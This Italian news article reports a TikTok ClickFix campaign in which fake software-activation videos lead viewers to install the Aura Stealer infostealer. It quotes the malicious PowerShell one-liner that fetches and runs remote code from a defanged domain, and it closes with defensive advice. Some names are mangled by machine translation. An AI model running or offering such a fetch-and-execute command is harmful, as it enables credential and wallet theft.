Dataconomy IT
  • Notizia
  • Industria
Subscribe
No Result
View All Result
Dataconomy IT
  • Notizia
  • Industria
Subscribe
No Result
View All Result
Dataconomy IT
No Result
View All Result

L’ultima truffa di TikTok insegna agli utenti come infettare i propri PC

byEmre Çıtak
20 Ottobre 2025
in Notizia, Sicurezza Informatica
Home Notizia
Share on FacebookShare on Twitter
Google Preferred Source

I criminali informatici stanno distribuendo malware in grado di rubare informazioni su TikTok utilizzando video camuffati da guide per l’attivazione di software gratuiti. Secondo Computer che dormeXavier Mertens, gestore dell’ISC, ha identificato la campagna in corso, che utilizza un metodo di ingegneria sociale noto come attacco ClickFix per infettare i sistemi informatici. I video, osservati da Computer che dormeaffermano di fornire istruzioni per l’attivazione di software legittimo come Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro e Discord Nitro. La campagna promuove anche servizi fittizi, tra cui “Netflix Premium” e “Spotify Premium”. Mertens ha osservato che questa attività è in gran parte la stessa di una campagna precedentemente osservata dalla società di sicurezza Trend Micro a maggio. I video utilizzano una tecnica di ingegneria sociale che presenta una soluzione apparentemente valida o una serie di istruzioni per indurre gli utenti a compromettere le proprie macchine. Questo attacco ClickFix induce gli utenti a eseguire comandi PowerShell dannosi. Ogni video visualizza un comando di una riga, come `iex (irm slmgr[.]win/photoshop)` e indica agli spettatori di eseguirlo con privilegi di amministratore. Il nome del programma nell’URL viene modificato per corrispondere al software impersonato; una falsa guida di Windows utilizzerebbe un URL contenente “windows” invece di “photoshop”. Quando il comando viene eseguito, PowerShell si connette al sito remoto `slmgr[.]win` per recuperare ed eseguire un altro script PowerShell. Questo script scarica due eseguibili dalle pagine Cloudflare. Il primo, da `https://file-epq[.]pagine[.]dev/updater.exe`, è una variante del malware Aura Stealer. Questo infostealer è progettato per raccogliere credenziali del browser salvate, cookie di autenticazione, dati del portafoglio di criptovaluta e altre credenziali dell’applicazione. I dati rubati vengono quindi caricati sugli aggressori, garantendo loro l’accesso agli account della vittima. Nell’ambito dell’attacco viene scaricato anche un secondo payload, `source.exe`. Secondo Mertens, questo eseguibile compila automaticamente il codice utilizzando il compilatore Visual C# integrato in .NET (`csc.exe`). Il codice risultante viene successivamente iniettato e lanciato direttamente in memoria. Lo scopo specifico di questo carico utile aggiuntivo rimane poco chiaro. Gli utenti che hanno eseguito questi passaggi dovrebbero considerare tutte le loro credenziali compromesse. La linea di condotta consigliata è reimpostare immediatamente le password su tutti i siti e servizi utilizzati per impedire l’accesso non autorizzato all’account e ulteriori furti di dati. Gli attacchi ClickFix sono diventati popolari nell’ultimo anno e vengono utilizzati per distribuire vari ceppi di malware nelle campagne di ransomware e furto di criptovaluta. Come regola generale, gli utenti non dovrebbero mai copiare testo da un sito Web ed eseguirlo in una finestra di dialogo del sistema operativo. Questo avviso include la barra degli indirizzi di Esplora file, il prompt dei comandi, i prompt di PowerShell, il terminale macOS e le shell Linux.


Credito immagine in primo piano

Tags: tiktoktruffa

Related Posts

Amazon aggiunge anteprime dei prodotti generate dall’intelligenza artificiale ai risultati di ricerca

Amazon aggiunge anteprime dei prodotti generate dall’intelligenza artificiale ai risultati di ricerca

4 Giugno 2026
Google Wallet aggiungerà ID digitali da selezionati paesi dell’UE quest’estate

Google Wallet aggiungerà ID digitali da selezionati paesi dell’UE quest’estate

4 Giugno 2026
Google lancia Ask Gemini in Drive agli utenti Workspace idonei

Google lancia Ask Gemini in Drive agli utenti Workspace idonei

4 Giugno 2026
Nintendo rilascerà in Europa uno Switch 2 facile da riparare

Nintendo rilascerà in Europa uno Switch 2 facile da riparare

4 Giugno 2026
Meta lancia gli agenti aziendali AI su WhatsApp, Instagram e Messenger

Meta lancia gli agenti aziendali AI su WhatsApp, Instagram e Messenger

4 Giugno 2026
Sony rivela God of War: Laufey per PS5

Sony rivela God of War: Laufey per PS5

3 Giugno 2026

Recent Posts

  • Fezbet opinioni – croki e metodo: rejestracja, bonusy, płatności e bezpieczeństwo
  • DivaSpin – apertura completa, consigli e guida pratica per i giocatori francesi
  • Scommesse sportive online Zoccer: metodi di pagamento, depositi istantanei e reti rapide
  • Diva Spin Casino – Was deutsche Spieler 2026 wissen müssen
  • Bonus senza deposito di Zoccer Casino: guida alla verifica dell’account

Recent Comments

Nessun commento da mostrare.
Dataconomy IT

COPYRIGHT © DATACONOMY MEDIA GMBH, ALL RIGHTS RESERVED.

  • Sample Page

Follow Us

  • Notizia
  • Industria
No Result
View All Result
Subscribe

This website uses cookies to improve your experience. You can choose to accept or reject them. Visit our Privacy Policy.